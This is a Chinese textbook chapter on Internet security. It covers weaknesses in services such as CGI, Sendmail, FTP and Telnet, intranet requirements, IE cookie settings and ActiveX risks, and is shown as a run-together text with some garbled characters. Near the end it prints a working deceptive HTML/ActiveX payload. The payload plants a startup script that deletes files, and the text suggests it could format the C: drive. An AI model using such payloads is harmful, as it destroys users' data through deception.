Internet的安全性概述

Internet的安全性概述第8章Internet的安全性8.1Internet/Intranet的安全概述8.2網(wǎng)頁中的新技術(shù)與IE的安全性8.3電子郵件與OutlookExpress的安全8.4IIS服務(wù)器的安全8.5本章小結(jié)練習(xí)題Internet是全世界最大、覆蓋面最廣的計(jì)算機(jī)互聯(lián)網(wǎng)絡(luò)。它不僅僅把眾多計(jì)算機(jī)連接起來，而更重要的是Internet中含有極其豐富的信息資源。因此，人們常稱Internet是現(xiàn)代的信息超級(jí)市場，是信息的海洋，也是全球信息基礎(chǔ)設(shè)施即信息高速公路的雛形。然而Internet本身是沒有邊界的、全球的互聯(lián)網(wǎng)，不屬于任何一個(gè)組織和任何一個(gè)國家；在Internet上既沒有法令也沒有法規(guī)，人們的行為幾乎不受制約。如今在Internet上的安全問題已成了計(jì)算機(jī)和通信界關(guān)注的焦點(diǎn)，從安全問題角度考慮，給認(rèn)為Internet已經(jīng)完全勝任商務(wù)活動(dòng)的人們潑了一盆冷水，也延緩或阻礙了Internet作為國家信息基礎(chǔ)設(shè)施或全球信息基礎(chǔ)設(shè)施成為大眾媒體的發(fā)展進(jìn)程。一些調(diào)查研究表明，許多個(gè)人和公司之所以對加入Internet持觀望態(tài)度，其主要原因就是出于對安全的考慮。與此同時(shí)，也有分析家警告商家不加入Internet會(huì)有什么危害。盡管眾說紛紜，但大家一致認(rèn)為Internet需要更多更好的安全機(jī)制。在享受Internet帶來許多好處的同時(shí)，了解Internet的工作機(jī)制、安全漏洞、加強(qiáng)自身的安全意識(shí)和采取一定的防范措施是非常必要的。本章將學(xué)習(xí)有關(guān)Internet應(yīng)用中的安全性問題，主要內(nèi)容有：Internet/Intranet的安全概述；InternetExplorer的安全性；IIS服務(wù)器的安全性；電子郵件的安全性；OutlookExpress的安全性。8.1Internet/Intranet的安全概述8.1.1Internet的脆弱性Internet是使用公共語言進(jìn)行通訊的全球計(jì)算機(jī)網(wǎng)絡(luò)。它類似于國際系統(tǒng)，即無人擁有或控制整個(gè)系統(tǒng)，但是以大型網(wǎng)絡(luò)的工作方式連接。Internet本身是沒有邊界的、全球的互聯(lián)網(wǎng)，不屬于任何一個(gè)組織和任何一個(gè)國家；在Internet上既沒有法令也沒有法規(guī)，人們的行為幾乎不受制約。由于沒有國際互聯(lián)網(wǎng)上通行的國際法規(guī)，所以對犯罪沒有處理的依據(jù)。Internet有很多安全隱患，主要表現(xiàn)在以下幾方面。(1)Internet是跨國界的，黑客樂于進(jìn)行跨國攻擊。(2)通過IP地址識(shí)別網(wǎng)絡(luò)上的用戶是完全不可靠的。眾所周知，大多數(shù)國家都實(shí)行身份證或戶籍管理制度，這種制度就是把人和他的身份對應(yīng)起來，通過身份來控制和管理個(gè)人。但是在Internet上，IP地址只是一個(gè)數(shù)字的標(biāo)志，根本不能代表實(shí)際的身份。通過IP地址來識(shí)別和管理存在嚴(yán)重的安全漏洞。(3)Internet本身沒有中央管理機(jī)制，沒有法令和法規(guī)。(4)Internet從技術(shù)上來講是開放的、標(biāo)準(zhǔn)的，是為君子設(shè)計(jì)而不防小人的。(5)Internet沒有審計(jì)和記錄的功能，也就是說對發(fā)生的事情沒有記錄，這也是一個(gè)安全隱患。它是瑞士日內(nèi)瓦歐洲粒子物理實(shí)驗(yàn)室發(fā)明的，并在短時(shí)間內(nèi)得到迅猛發(fā)展，是人們最常用的Internet服務(wù)。目前Web站點(diǎn)遍及世界各地。萬維網(wǎng)用超文本技術(shù)把Web站點(diǎn)上的文件鏈在一起，文件可以包括文本、圖形、聲音、視頻以及其他形式。用戶可以自由地通過超文本導(dǎo)航從一個(gè)文件進(jìn)入另一個(gè)文件，方便地搜索信息。不管文件在哪里，只要在HTTP協(xié)議連接的字或圖上用鼠標(biāo)點(diǎn)一下就行了。搜索Web文件的工具是瀏覽器，常用的瀏覽器是NetscapeNavigator和MicrosoftInterneExplorer。HTTP只是瀏覽器中使用的一種協(xié)議，瀏覽器還會(huì)使用FTP、GOPHER、WAIS等協(xié)議，也會(huì)包括NNTP和SMTP等協(xié)議。因此，當(dāng)用戶在使用瀏覽于通過HTML表單的請求而提供的數(shù)據(jù)。在編寫程序之前要仔細(xì)研究完整的CGI規(guī)范。其地址是：:///cgi/。要想有效地使用CGI，必須要理解HTML表單，它通常意味著向CGI傳遞數(shù)據(jù)。這些都記錄于HTML2.0規(guī)范RFC1866：/rfc/rfc1886.txt。當(dāng)用戶進(jìn)入hotmail時(shí)，會(huì)發(fā)現(xiàn)下面的用戶的輸入信息，一般用戶是通過表格把輸入信息傳給CGI程序的，然后CGI程序可以根據(jù)用戶的要求進(jìn)行一些處理；在一般情況下會(huì)生成一個(gè)HTML文件，并傳回給用戶。很多CGI程序都存在安全漏洞，很容易被黑客利用做一些非法的事情，如把/etc/passwd文件傳送給黑客、刪除服務(wù)器上的文件等。還有，很強(qiáng)大而靈活的接口通常的代價(jià)就是系統(tǒng)安全，CGI也不例外。程序員經(jīng)常會(huì)匆忙地編寫出CGI程序，就像其他簡單程序一樣，而沒有考慮到每個(gè)CGI程序都是一個(gè)Internet服務(wù)器，都會(huì)帶來同樣的危險(xiǎn)。CGI經(jīng)常被編寫成等待一定格式的數(shù)據(jù)，但是實(shí)質(zhì)上不限制長度的任意數(shù)據(jù)都可以發(fā)送給程序。這意味著CGI必須被編寫得健壯一些，當(dāng)受到一些惡意的或者不是想要的數(shù)據(jù)時(shí)，它要能夠適當(dāng)?shù)闹兄?。通常使用的Internet服務(wù)器，如sendmail和finger在被編寫時(shí)都充分意識(shí)到了這些危險(xiǎn)性。這些程序的源代碼已經(jīng)被各種各樣的人研究多年，以便找出問題。即使這樣，安全性問題仍然存在。鑒于此，如果允許用戶創(chuàng)建CGI程序卻不仔細(xì)去評(píng)估其中的危險(xiǎn)性并采取行動(dòng)減小這種危險(xiǎn)性，那簡直是太愚蠢了。2.電子郵件服務(wù)的安全電子郵件服務(wù)給人們提供了一種便宜、方便和快捷的服務(wù)，如今的大學(xué)生們幾乎人人都有一個(gè)E-mail地址，E-mail地址也開始出現(xiàn)在人們的名片上了。現(xiàn)在，UNIX環(huán)境下的電子郵件服務(wù)器一般是Sendmail，它是一個(gè)復(fù)雜且功能強(qiáng)大的應(yīng)用軟件，正因?yàn)槿绱怂陌踩┒淳透唷３绦蛟烬嫶?、越?fù)雜則安全漏洞出現(xiàn)的可能性就越大，這是一個(gè)公認(rèn)的原理。Sendmail在UNIX環(huán)境下以root賬戶運(yùn)行，所以如果該程序被黑客利用，用戶主機(jī)的損失將會(huì)是十分巨大的。因特網(wǎng)蠕蟲病毒曾經(jīng)震驚世界，它使大批的服務(wù)器陷于癱瘓之中，這種病毒就是利用了Sendmail的安全缺陷。如果要使這些功能以更安全的方式實(shí)現(xiàn)，需要對Sendmail進(jìn)行重新設(shè)計(jì)和重新實(shí)現(xiàn)，但人們又會(huì)擔(dān)心新的版本會(huì)出現(xiàn)更多的人們不知道的安全漏洞。Sendmail的問題被人們修修補(bǔ)補(bǔ)，但總是有新的問題出現(xiàn)，“最新Sendmail修訂版”在網(wǎng)絡(luò)安全中已經(jīng)成了一種笑料。除此之外，電子郵件附著的Word文件和其他文件有可能會(huì)帶有病毒。電子郵件炸彈也是一個(gè)令人頭疼的問題，試想，用戶一下子收到了一大堆垃圾郵件，直到郵件箱被塞滿，用戶會(huì)有什么感受？3.FTP服務(wù)和TFTP服務(wù)的安全這兩個(gè)服務(wù)都是適用于傳輸文件的，但用的場合不同，安全程度也不同。TFTP服務(wù)用于局域網(wǎng)，在無盤工作站啟動(dòng)時(shí)用于傳輸系統(tǒng)文件，因?yàn)樗粠в腥魏伟踩J(rèn)證所以安全性極差，因此常被人用來竊取密碼文件/etc/passwd。FTP服務(wù)對于局域網(wǎng)和廣域網(wǎng)都可以用來下載任何類型的文件。FTP服務(wù)由TCP/IP的文件傳輸協(xié)議支持。只要連入Internet的兩臺(tái)計(jì)算機(jī)都支持TCP/IP協(xié)議，運(yùn)行FTP軟件，用戶就像使用自己計(jì)算機(jī)上的資源管理器一樣，將遠(yuǎn)程計(jì)算機(jī)上的文件復(fù)制到自己的硬盤。大多數(shù)提供FTP服務(wù)的站點(diǎn)允許用戶以anonymous也不能對系統(tǒng)作任意的修改。在匿名FTP區(qū)域中一個(gè)可寫的目錄常常是應(yīng)該擔(dān)心的。文件傳輸和電子郵件一樣會(huì)給網(wǎng)上的站點(diǎn)帶來不受歡迎的數(shù)據(jù)和程序。首先文件傳輸可能會(huì)帶來“特洛伊木馬”，這會(huì)給站點(diǎn)以毀滅性的打擊。其次是會(huì)給站點(diǎn)帶入無聊的游戲、盜版軟件以及色情圖畫等，也會(huì)帶來時(shí)間和磁盤空間的煩惱，還可能嵩斐傘熬芫瘛憊セ鰲Ｄ涿FTP服務(wù)的安全在很大程度上決定于一個(gè)系統(tǒng)管理員的水平。一個(gè)低水平的系統(tǒng)管理員很可能會(huì)錯(cuò)誤配置權(quán)限，從而被黑客利用破壞整個(gè)系統(tǒng)。4.遠(yuǎn)程登錄(Telnet)的安全遠(yuǎn)程登錄是提供遠(yuǎn)程終端申請的程序。這是一種十分有用又十分節(jié)約的遠(yuǎn)程申請機(jī)制。Telnet是因特網(wǎng)上常用的登錄程序。它真實(shí)地模仿一個(gè)終端，但不能是圖形工作站。不用做特殊的安排就可以為因特網(wǎng)上任何站點(diǎn)上的用戶提供遠(yuǎn)程申請。但它只能提供基于字符(文本)的應(yīng)用。Telnet不僅允許用戶登錄到遠(yuǎn)程終端主機(jī)上，還允許用戶執(zhí)行那臺(tái)主機(jī)的命令。這樣北京的用戶可以對上海的機(jī)器進(jìn)行終端仿真，并運(yùn)行上海及其上的程序，就像用戶身在上海一樣。Telnet看來像是十分安全的服務(wù)，但它要用戶認(rèn)證。Telnet送出的所有信息是不加密的，很容易被黑客攻擊。現(xiàn)在Telnet被認(rèn)為是從遠(yuǎn)程系統(tǒng)申請你的站點(diǎn)時(shí)是最危險(xiǎn)的服務(wù)之一。要使Telnet安全，必須選擇安全的認(rèn)證方案，防止站點(diǎn)被竊聽或侵襲。5.用戶新聞(usenetnews)用戶新聞或新聞組是因特網(wǎng)上的公告牌，它提供了多對多的通信。最大眾化的新聞組會(huì)有幾十萬人參加。像電子郵件一樣，用戶新聞具有危險(xiǎn)性。并且大多數(shù)站點(diǎn)的新聞信息量大約6個(gè)月翻一番，很容易造成溢出。為了安全起見，一定要配置好新聞服務(wù)。網(wǎng)絡(luò)新聞傳輸協(xié)議(netwarenewstransferprotocol，NNTP)是因特網(wǎng)上轉(zhuǎn)換新聞的協(xié)議。很多站點(diǎn)建立了預(yù)定的本地新聞組，以便于本地用戶間進(jìn)行討論。這些新聞組往往包含秘密的、有價(jià)值的或者是敏感的信息。有些人可以通過NNTP服務(wù)器私下申請這些預(yù)定新聞組，結(jié)果造成泄密。如果要建立預(yù)定新聞組，一定要小心的配置NNTP服務(wù)器，控制對這些新聞組的申請。6.其他的網(wǎng)絡(luò)信息服務(wù)(1)Finger和Whois是可以提供有關(guān)人的信息的兩種查詢服務(wù)。Finger可以查找在網(wǎng)絡(luò)上擁有賬戶的用戶信息，而不管用戶目前是否登錄在網(wǎng)上。這些信息包括人的真實(shí)姓名、賬號(hào)、號(hào)碼、公司地址、最近何時(shí)何地登錄注冊的信息以及用戶的其他材料。在TCP/IP協(xié)議中只需一個(gè)IP地址便可以提供許多關(guān)于主機(jī)的信息，例如誰在登錄、登錄的時(shí)間、地點(diǎn)等。對一個(gè)訓(xùn)練有素的黑客來說，F(xiàn)inger無疑是其進(jìn)入目標(biāo)主機(jī)的一把利器。因?yàn)橹懒擞脩裘偷扔诔晒α艘话?。鑒于此，如果你的系統(tǒng)不需要這種服務(wù)，就請?jiān)谀愕某?jí)守護(hù)進(jìn)程的配置文件(inetd.conf)中將它注釋掉。Whois和Finger相似，WAIS是基于文件內(nèi)容(關(guān)鍵字)的自動(dòng)搜索服務(wù)。WAIS和Archie比Web和Gopher漏洞要小一點(diǎn)，因?yàn)樗鼈儾环祷厝我庑问降臄?shù)據(jù)。但當(dāng)提供這些服務(wù)時(shí)可能會(huì)引起其他的漏洞。例如，允許用戶直接申請Archie，就會(huì)允許闖入者申請NFS和NIS/YP服務(wù)器。(3)除了上面提到的Finger和TFTP服務(wù)，還有XWindows服務(wù)和基于RPC的NFS服務(wù)和BSDUNIX的以“r”開頭的服務(wù)，如Rlogin、rsh和rexec。這些服務(wù)在設(shè)計(jì)上安全性很差，一般只在內(nèi)部網(wǎng)使用。如果有防火墻，應(yīng)把這些服務(wù)限制在內(nèi)網(wǎng)中。8.1.3Intranet的安全性Intranet又稱企業(yè)內(nèi)部網(wǎng)，由于它在局域網(wǎng)內(nèi)部采用了Internet技術(shù)而得名“Intranet”。因此，Intranet指的是私人、公司和企業(yè)內(nèi)部網(wǎng)絡(luò)上為用戶提供信息的任何使用TCP/IP協(xié)議的網(wǎng)絡(luò)。這些網(wǎng)絡(luò)中的一部分，雖然沒有連接到Internet，但是使用了Internet通訊標(biāo)準(zhǔn)和工具。例如，公司中安裝的Web服務(wù)器，可在內(nèi)部員工之間發(fā)布公司業(yè)務(wù)通訊、銷售圖表及其他的公共文檔。換句話說，Intranet就是采用了Internet技術(shù)和標(biāo)準(zhǔn)的私有網(wǎng)絡(luò)。Intranet和Internet相比較，存在的主要問題同樣是安全方面的問題。Intranet本身是一個(gè)相對獨(dú)立的網(wǎng)絡(luò)空間，相對獨(dú)立是指它有自己的邊界。另一個(gè)方面，Intranet具有中央管理，這一點(diǎn)很好理解。一個(gè)Intranet有它自己的主人，屬于某一個(gè)機(jī)構(gòu)或某一個(gè)單位，那么這個(gè)機(jī)構(gòu)和這個(gè)單位要對這個(gè)網(wǎng)絡(luò)實(shí)施管理，而且管理的核心內(nèi)容就是安全。Intranet本身只采用IP識(shí)別是不夠的，因?yàn)镮P地址易被竊用。Internet和Intranet相比，最主要的一點(diǎn)差別在于：Internet沒有管理，而Intranet有管理。從技術(shù)角度來看，Intranet需要一套身份認(rèn)證和授權(quán)管理系統(tǒng)。Intranet的安全需求包括：(1)解決網(wǎng)絡(luò)的邊界安全，由于它本身是和國際互聯(lián)網(wǎng)相連的；(2)要保證網(wǎng)絡(luò)內(nèi)部的安全；(3)不僅要實(shí)現(xiàn)系統(tǒng)安全，還要實(shí)現(xiàn)數(shù)據(jù)安全；(4)建立全網(wǎng)通行的身份識(shí)別系統(tǒng)，實(shí)現(xiàn)用戶的統(tǒng)一管理；(5)在身份識(shí)別和資源統(tǒng)一管理的基礎(chǔ)之上，實(shí)現(xiàn)統(tǒng)一的授權(quán)管理。所謂的統(tǒng)一授權(quán)管理就是在用戶和資源之間進(jìn)行嚴(yán)格的訪問控制；(6)信息傳輸時(shí)實(shí)現(xiàn)數(shù)據(jù)的完整性和保密性；(7)建立一整套審計(jì)、記錄的機(jī)制，也就是說網(wǎng)上發(fā)生的事情要記錄下來，再根據(jù)記錄進(jìn)行事后的處理；(8)把技術(shù)手段和行政手段融為一體，形成全局的安全管理。源的能力高低來區(qū)分的。安全和靈活是一對矛盾的東西。高的安全級(jí)別必然帶來靈活性的下降和功能的限制。Web技術(shù)的發(fā)展也是安全和功能強(qiáng)大的平衡。純粹文字的HTML或許是安全的(如果我們把內(nèi)容給予用戶身心帶來的沖擊。比如暴力、色情等不看做安全問題)，但顯然其功能會(huì)受到很大限制。允許在網(wǎng)頁上下載和使用ActiveX顯然是不安全的，但功能會(huì)很強(qiáng)大也是毋庸質(zhì)疑的。安全是和對象相關(guān)的。一般可以認(rèn)為，小組里十分可信的站點(diǎn)，例如，辦公室的軟件服務(wù)器的數(shù)據(jù)和程序是比較安全的，同時(shí)公司的站點(diǎn)是中等水平安全，當(dāng)然Internet上的大多數(shù)訪問被認(rèn)為是相當(dāng)不安全的，其中黑客們的訪問自然是極不安全的?；趯υL問對象和訪問方法的劃分，高版本的IE(如IE5.0)定義了4個(gè)通過瀏覽器訪問Internet的安全級(jí)別：高、中、中低、低和4類訪問對象：Internet、本地Internet(即Intranet)、可信站點(diǎn)和受限站點(diǎn)等。也就是說IE支持Cookies，Java，ActiveX等網(wǎng)絡(luò)新技術(shù)，同時(shí)也可以通過安全配置來限制用戶使用ActiveX控件、如何使用Cookies、如何使用腳本(Script)、如何下載數(shù)據(jù)和程序、如何驗(yàn)證用戶登陸、以及對于標(biāo)準(zhǔn)HTML一些可能帶來問題的特性的限制；如Frame(框架網(wǎng)頁)的使用、提交表單的方式等等。由于IE瀏覽器是隨著Windows系統(tǒng)發(fā)送的，它已成為世界上使用人數(shù)最多的瀏覽器。同時(shí)Microsoft公司的產(chǎn)品一般安全性較差，IE瀏覽器也不例外。下面來談?wù)動(dòng)嘘P(guān)Cookie，Java，ActiveX等技術(shù)的安全問題和IE瀏覽器的漏洞帶來的安全問題，以及針對這些問題應(yīng)采取的防范措施。8.2.1瀏覽器中Cookie的安全1.Cookie簡介Cookie是由Netscape開發(fā)并將其作為持續(xù)保存狀態(tài)信息和其他信息的一種方式，目前絕大多數(shù)的瀏覽器都支持Cookie協(xié)議。如果能夠鏈入Web網(wǎng)頁或其他網(wǎng)絡(luò)的話，就可以使用Cookie來傳遞某些具有特定功能的小信息塊。Cookie是一個(gè)儲(chǔ)存于瀏覽器目錄中的文本文件，約由255個(gè)字符組成，僅占4KB硬盤空間。當(dāng)用戶正在瀏覽某站點(diǎn)時(shí)，它儲(chǔ)存于用戶機(jī)的RAM中；退出瀏覽器后，它儲(chǔ)存于用戶的硬盤中。儲(chǔ)存在Cookie中的大部分信息是普通的信息。例如，當(dāng)瀏覽一個(gè)站點(diǎn)時(shí)，此文件記錄了每一次的擊鍵信息和被訪站點(diǎn)的URL等。但是許多Web站點(diǎn)使用Cookies來儲(chǔ)存針對私人的數(shù)據(jù)，例如，注冊口令、用戶名、信用卡編號(hào)等。MSN(微軟提供的網(wǎng)絡(luò)在線服務(wù))、Netscape都完全采用了使用Cookies儲(chǔ)存信息的個(gè)性化處理。假如想查看儲(chǔ)存在Cookie文件中的信息，可以從瀏覽器目錄中查找名為Cookie.txt或MagicCookie(Mac機(jī))的文件，然后利用文本編輯器和字處理軟件打開查看即可。2.Cookie的安全性HTTPCookie不會(huì)給機(jī)器帶來任何傷害，比如從硬盤中獲取數(shù)據(jù)、取得E-mail地址或竊取某些私人的敏感信息等。實(shí)際上，Java與JavaScript早期的運(yùn)行版本存在這方面的缺陷，但這些安全方面漏洞的絕大部分已經(jīng)被堵塞了?？蓤?zhí)行屬性是儲(chǔ)存于一個(gè)文件中的程序代碼執(zhí)行其功能的必要條件，而Cookies是以標(biāo)準(zhǔn)文本文件形式儲(chǔ)存的，因此不會(huì)傳遞任何病毒，所以從普通用戶意義上講，Cookie本身是安全可靠的。但是，隨著互聯(lián)網(wǎng)的迅速發(fā)展，網(wǎng)上服務(wù)功能的進(jìn)一步開發(fā)和完善，利用網(wǎng)絡(luò)傳遞的資料信息愈來愈重要，有時(shí)涉及到個(gè)人的隱私。因此，關(guān)于Cookies的一個(gè)值得關(guān)心的問題并不是Cookies對你的機(jī)器能做些什么，而是它能存儲(chǔ)些什么信息或傳遞什么信息到鏈接的服務(wù)器中。HTTPCookies可以被用來跟蹤網(wǎng)上沖浪者訪問過的特定站點(diǎn)，盡管站點(diǎn)的跟蹤不用Cookies也容易實(shí)現(xiàn)，不過利用Cookies使跟蹤到的數(shù)據(jù)更加堅(jiān)固可靠些。由于一個(gè)Cookie是Web服務(wù)器放置在機(jī)器上的、并可以重新獲取檔案的惟一的標(biāo)識(shí)符，因此Web站點(diǎn)管理員可以利用Cookies建立關(guān)于用戶及其瀏覽特征的詳細(xì)檔案資料。當(dāng)用戶登錄到一個(gè)Web站點(diǎn)后，在任一設(shè)置了Cookies的網(wǎng)頁上的單擊操作信息都會(huì)被加到該檔案中。檔案中的這些信息暫時(shí)主要用于站點(diǎn)的設(shè)計(jì)維護(hù)，但除站點(diǎn)管理員外并不否認(rèn)被別人竊取的可能，假如這些Cookies持有者們把一個(gè)用戶身份鏈接到他們的CookieID，利用這些檔案資料就可以確認(rèn)用戶的名字及地址。此外，某些高級(jí)的Web站點(diǎn)(如許多的網(wǎng)上商業(yè)部門)實(shí)際上采用了HTTPCookies的注冊鑒定方式。當(dāng)用戶在站點(diǎn)注冊或請求信息時(shí)，經(jīng)常輸入確認(rèn)他們身份的登記口令、E-mail地址或郵政地址到Web頁面的窗體中，窗體從Web頁面收集用戶信息并提交給站點(diǎn)服務(wù)器，服務(wù)器利用Cookies持久地保存信息，并將其放置在用戶機(jī)上，等待以后的訪問。這些Cookies內(nèi)嵌于HTML信息中，并在用戶機(jī)與站點(diǎn)服務(wù)器間來回傳遞，如果用戶的注冊信息未曾加密，將是很危險(xiǎn)的。因此，許多人認(rèn)為Cookie的存在對個(gè)人隱私是一種潛在的威脅。3.拒絕Cookie的方法如果感到不安全的話，可以拒絕Web服務(wù)器設(shè)置的Cookie信息或當(dāng)服務(wù)器在瀏覽器上設(shè)置Cookie時(shí)顯示警告窗口，它將告知設(shè)置的Cookies的值及其刪除所花費(fèi)的時(shí)間。在Windows下拒絕接受Cookie，可以刪除Cookie文件內(nèi)容或把文件屬性設(shè)置為只讀和隱含。在瀏覽器下拒絕的具體方法如下。(1)在IE中禁止。IE3.0及以上版本不是把所有的Cookies存儲(chǔ)在單個(gè)文件中，而是把每個(gè)Cookie作為獨(dú)立的文件儲(chǔ)存在“\Windows\cookies”目錄下，因此禁止Cookies較困難。①如果想禁止個(gè)別的Cookies，例如，記錄雙擊鍵操作的Cookies，可以通過刪除相應(yīng)文件內(nèi)容來破壞這些Cookies，然后把文件屬性改為只讀、隱藏、系統(tǒng)屬性，并且存儲(chǔ)文件。當(dāng)?shù)卿浀揭粋€(gè)設(shè)置了這種Cookies的站點(diǎn)時(shí)，它既不能從Cookies讀取任何信息，也不會(huì)傳遞新的信息給你。②通過IE瀏覽器總體提供的Cookies的安全設(shè)置選項(xiàng)，具體步驟為：打開瀏覽器→“工具”→“Internet選項(xiàng)”→選擇“安全”選項(xiàng)卡→單擊窗口列表中白色編輯框中Internet圖標(biāo)(地球標(biāo)志)，單擊窗口列表中下方的“自定義級(jí)別”(如圖8.1所示)→彈出“安全設(shè)置”對話框，移動(dòng)對話框中的垂直滾動(dòng)滑塊，直到出現(xiàn)“Cookies”設(shè)置選項(xiàng)，如圖8.2所示有兩個(gè)Cookies選項(xiàng)。圖8.1圖8.2允許使用存儲(chǔ)在你計(jì)算機(jī)上的Cookies指定IE如何處理來自Web站點(diǎn)的永久Cookie。Cookie是由Internet站點(diǎn)創(chuàng)建的文件，用于在計(jì)算機(jī)上存儲(chǔ)有關(guān)用戶的信息(例如身份和訪問該站點(diǎn)時(shí)的首選項(xiàng))。永久Cookie以文件的形式存儲(chǔ)在計(jì)算機(jī)上，當(dāng)IE關(guān)閉時(shí)，它仍然保留在計(jì)算機(jī)上。要指定IE接受Cookie而不必先行提示，請單擊“啟用”。要指定InternetExplorer在即將接收來自Web站點(diǎn)的Cookie時(shí)發(fā)出警告，請單擊“提示”。要指定不允許Web站點(diǎn)將Cookie存儲(chǔ)到計(jì)算機(jī)上，而且Web站點(diǎn)不能讀取本機(jī)上已有的Cookie，請單擊“禁用”。一般來說，為提高安全性應(yīng)選擇“禁止”。允許使用每個(gè)對話Cookies(未存儲(chǔ))指定InternetExplorer如何處理來自Web站點(diǎn)的臨時(shí)Cookie。如果希望InternetExplorer直接接收Cookie而不是事前提醒你，請單擊“啟用”。如果希望InternetExplorer在即將接收來自Web的Cookie時(shí)向用戶作出警告，請單擊“提示”。如果不允許來自Web站點(diǎn)的Cookie進(jìn)入用戶的計(jì)算機(jī)，并且不允許用戶計(jì)算機(jī)上已有的Cookie被Web站點(diǎn)讀取，請單擊“禁用”。③通過注冊表禁止Cookies，可刪除注冊表中的如下條目：\[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings\Cache\SpecialPaths\Cookies\]，然后重新啟動(dòng)機(jī)器，并刪除“Windows\cookies”目錄。(2)在NETSCAPE中禁止。在Netscape的目錄下有一個(gè)cookies.txt文件(在Mac機(jī)上稱為Magiccookie)，可以利用文本編輯器大膽地刪除文件的內(nèi)容，并把文件重新存為具有只讀、隱藏、系統(tǒng)屬性的文件，然后運(yùn)行Windows的注冊表編輯器，打開\[HKEY_CURRENT_USER\Software\Netscape\NetscapeNavigator\Cookies\]主鍵，將鍵值名CookieFile設(shè)置為CookieFile=NUL，此時(shí)硬盤上就不會(huì)再有持續(xù)保存的信息了。上述方法僅是禁止了長期設(shè)在硬盤上的Cookies，當(dāng)瀏覽器正在運(yùn)行時(shí)，設(shè)在內(nèi)存中的Cookies仍然未被禁止，但關(guān)閉瀏覽器后因其無法將Cookies寫入硬盤會(huì)清除掉這些Cookies。它的優(yōu)點(diǎn)是在瀏覽器運(yùn)行過程中，仍可以交換某些信息。同樣也可以設(shè)置Cookies時(shí)顯示警告窗口。(3)如果使用了其他支持Cookies的瀏覽器，那么一種較好的方法是使用某些可以拒絕Cookies的工具軟件。例如：InternetJunkbrster2.0(可下載)是一個(gè)非常好的選擇，它幾乎能用于所有的瀏覽器，作為一個(gè)代理存在于瀏覽器和Internet網(wǎng)之間,可以拒絕大約99%的Cookies。除了訪問允許設(shè)置Cookies的站點(diǎn)外，在使用瀏覽器時(shí)它可以禁止所有Cookies寫入硬盤中。8.2.2ActiveX的安全問題1.什么是ActiveXActiveX是Microsoft公司提供的一款高級(jí)技術(shù)，它可以像一個(gè)應(yīng)用程序一樣在瀏覽器中顯示各種復(fù)雜的應(yīng)用。ActiveX是一種技術(shù)集合，它使得在環(huán)球網(wǎng)上交互內(nèi)容得以實(shí)現(xiàn)。利用ActiveX技術(shù)，網(wǎng)上應(yīng)用變得生動(dòng)活撥，伴隨著多媒體效果、交互式對象和復(fù)雜的應(yīng)用程序，使用戶猶如感受CD質(zhì)量的音樂一般。ActiveX技術(shù)是一種集合所有其他使網(wǎng)絡(luò)生動(dòng)起來的技術(shù)粘合劑。它的主要好處是：動(dòng)態(tài)內(nèi)容可以吸引用戶，開放的、跨平臺(tái)支持可以運(yùn)行在Macintosh、Windows和UNIX操作系統(tǒng)上。ActiveX是一種開放平臺(tái)，利用它可以使開發(fā)人員為Internet和企業(yè)網(wǎng)開發(fā)出激動(dòng)人心并包含動(dòng)態(tài)內(nèi)容的程序。微軟為Internet設(shè)計(jì)的主要新技術(shù)之一，具體功能闡述如下。(1)ActiveX控件ActiveX控件(以前稱為OLE控件)指的是能夠被插入網(wǎng)頁或任何稱作控件容器庫的應(yīng)用程序之中的對象。例如，按鈕、股票計(jì)數(shù)器和直方圖。(2)ActiveX文檔ActiveX文檔能夠被網(wǎng)絡(luò)瀏覽器或文檔瀏覽器顯示。傳統(tǒng)的嵌入式對象受限于頁面而嵌入在文檔之中，利用ActiveX文檔可以在整個(gè)客戶區(qū)域中以框架形式顯示。(3)ActiveX服務(wù)器框架用戶能夠擴(kuò)展網(wǎng)絡(luò)服務(wù)提供的定制網(wǎng)頁，這些定制網(wǎng)頁的內(nèi)容可以來源于數(shù)據(jù)庫或是一個(gè)在服務(wù)器上運(yùn)行的程序。(4)ActiveX腳本JavaScript、VBScript和其他腳本語言可以連接控件，在網(wǎng)頁中加入交互式功能。腳本功能可以將處理過程從服務(wù)器方移至客戶方。例如，表單內(nèi)容的合法性檢查可以在客戶方完成。(5)HTML擴(kuò)展HTML擴(kuò)展，例如，對象標(biāo)簽已經(jīng)被加入用于支持控件和腳本。2.ActiveX的安全問題要想安全地使用IE瀏覽器訪問Internet并杜絕ActiveX惡意地攻擊，就必須首先了解使用ActiveX的攻擊方式，然后才能掌握防范ActiveX攻擊的方法。因?yàn)锳ctiveX的強(qiáng)大功能，它可以做很多的事情，它的危害性也就進(jìn)一步加大了。在ActiveX推出不久人們相繼發(fā)現(xiàn)了ActiveX的許多副作用，其中最大一個(gè)漏洞是用戶通過瀏覽器瀏覽一些帶有惡意的ActiveX控件，這些控件可以在用戶毫不知情的情況下執(zhí)行Windows系統(tǒng)中任何程序。這將會(huì)給用戶帶來很大的安全風(fēng)險(xiǎn)，如黑客可以執(zhí)行formatc:命令來格式化硬盤。試想一下，如果用戶正在上網(wǎng)，突然屏幕變黑，指示燈狂閃，硬盤亂叫，瞬間用戶的數(shù)據(jù)就消失了，這可不是開玩笑，它真的存在。這是利用了Windows的一個(gè)默認(rèn)的ActiveX控件來完成的，下面的一個(gè)例子是利用該控件刪除硬盤C:\test.txt文件，代碼如下：<p><objectid=″scr″classid=″classid:06290BD548AA11D28432006008C3FBFC″></object></p><scriptlanguage=Javascript>{scr.Reset();scr.Path=″C:\Windows\StartMenu\Programs\test.hta″;scr.Doc=″<objectid='wash'classid='classid:f935DC221CF011D0ADB900C04FD58A0B'></object><SCRIPT>wash.Run('start/mdeltreec:/test.txt/Y');alert('IMPORTANT:Windowsisremovingunusedtemporaryfiles。');</″+″SCRIPT>″;scr.write();}</script>下面做一個(gè)試驗(yàn)，把這段代碼放入一個(gè)HTML文件中在IE中打開，沒有任何動(dòng)靜，這就是它的高明所在。這時(shí)，它已經(jīng)悄悄的藏在Windows的啟動(dòng)設(shè)置中了，即是在Windows的啟動(dòng)設(shè)置“C:\Windows\StartMenu\Programs\啟動(dòng)”中做了手腳。當(dāng)用戶重新啟動(dòng)計(jì)算機(jī)時(shí)，它會(huì)彈出一個(gè)警告窗口：“IMPORTANT：Windowsisremovingunusedtemporaryfi1es?！?Windows正在移走沒有的臨時(shí)文件)這是一個(gè)騙局，它真正做的是“刪除C:\test.txt文件”(這是中文版Windows的代碼，如果是英文版，classid后面的參數(shù)就要作調(diào)整)，如果用戶將代碼中deltreec:/test.txt/Y改成formatc:/autotest，